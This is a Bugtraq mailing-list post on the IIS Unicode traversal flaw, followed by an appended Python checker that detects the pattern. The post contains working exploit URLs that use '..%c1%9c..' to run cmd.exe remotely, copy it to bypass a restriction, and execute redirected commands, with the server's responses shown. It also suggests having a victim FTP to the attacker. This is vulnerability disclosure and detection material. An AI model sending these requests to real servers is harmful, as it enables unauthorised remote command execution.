Bugtraq mailing list archives

Re: IIS Unicode


From: Nsfocus Security Team <security () NSFOCUS COM>
Date: Wed, 25 Oct 2000 16:12:13 +0800

If we copy and rename "cmd.exe" to another filename, the limit can be bypassed.

(1) copy "..\..\winnt\system32\cmd.exe" to "..\..\inetpub\scripts\cmd1.exe"

http://site/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\..\winnt\system32\cmd.exe+cmd1.exe

IIS returned:

"CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:


        1 file(s) copied."


(2) run "cmd1.exe /c echo abc >aaa & dir & type aaa "

http://site/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa

IIS returned:

" Directory of c:\inetpub\scripts

10/25/2000  03:48p      <DIR>          .
10/25/2000  03:48p      <DIR>          ..
10/25/2000  03:51p                   6 aaa
12/07/1999  05:00a             236,304 cmd1.exe
..
abc
"

---Original Message---
Bugtraq ID 1806,
http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:

I was having problems executing a command that contains a redirect (>) using
any of the IIS Unicode exploits (including my own exploits on SecurityFocus
;) ). If anyone can get a redirect working, please let me know. In order to get
some interesting tools on the victim, you would probably want to have the
victim FTP to the attacker. The problem without a redirect is that you cannot
build the FTP command file, and you are a bit stuck.

[snip]
------------------------------------------------------
Roelof W Temmingh              SensePost IT security


Regards,
Nsfocus Security Team <security () nsfocus com>
http://www.nsfocus.com
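
As an added example (not from the original post or from Nsfocus), a small Python checker that flags request URIs carrying the overlong UTF-8 encodings of "\" and "/" (%c1%9c, %c0%af) that the traversals above rely on, and reports whether the decoded path climbs out of the web root; the sample requests are constructed from the URLs quoted in the post.

```python
"""Flag IIS-style overlong UTF-8 traversal (e.g. "..%c1%9c..") in request URIs."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request paths modelled on the URLs in the post; not real log data.
SAMPLE_REQUESTS = [
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+..\\..\\winnt\\system32\\cmd.exe+cmd1.exe",
    "/scripts/..%c1%9c../inetpub/scripts/cmd1.exe?/c+echo+abc+>aaa&dir&type+aaa",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/report.asp?id=42",          # ordinary request, must not be flagged
    "/docs/caf%c3%a9.html",               # well-formed 2-byte UTF-8, must not be flagged
]

def lenient_decode(raw: bytes) -> tuple[str, list[str]]:
    """Decode like a lenient UTF-8 decoder that accepts overlong 2-byte forms.
    Python's own decoder rejects them, so the 2-byte case is handled by hand.
    Returns (decoded_text, list of overlong sequences seen as "%xx%xx").
    """
    out, overlong, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            if cp < 0x80:  # an ASCII char spelled in two bytes: overlong form
                overlong.append("%%%02x%%%02x" % (b, raw[i + 1]))
            out.append(chr(cp))
            i += 2
        else:
            out.append(chr(b) if b < 0x80 else "\ufffd")
            i += 1
    return "".join(out), overlong

def analyse_request(uri: str) -> dict:
    """Report overlong sequences and whether the decoded path climbs above the web root."""
    path = uri.split("?", 1)[0]
    decoded, overlong = lenient_decode(unquote_to_bytes(path))
    depth, escapes = 0, False
    for seg in re.split(r"[\\/]+", decoded):   # treat "/" and decoded "\" alike
        if seg == "..":
            depth -= 1
            escapes = escapes or depth < 0
        elif seg not in ("", "."):
            depth += 1
    return {"overlong": overlong, "escapes_webroot": escapes,
            "suspicious": bool(overlong) or escapes}

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(analyse_request(req)["suspicious"], req)
```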
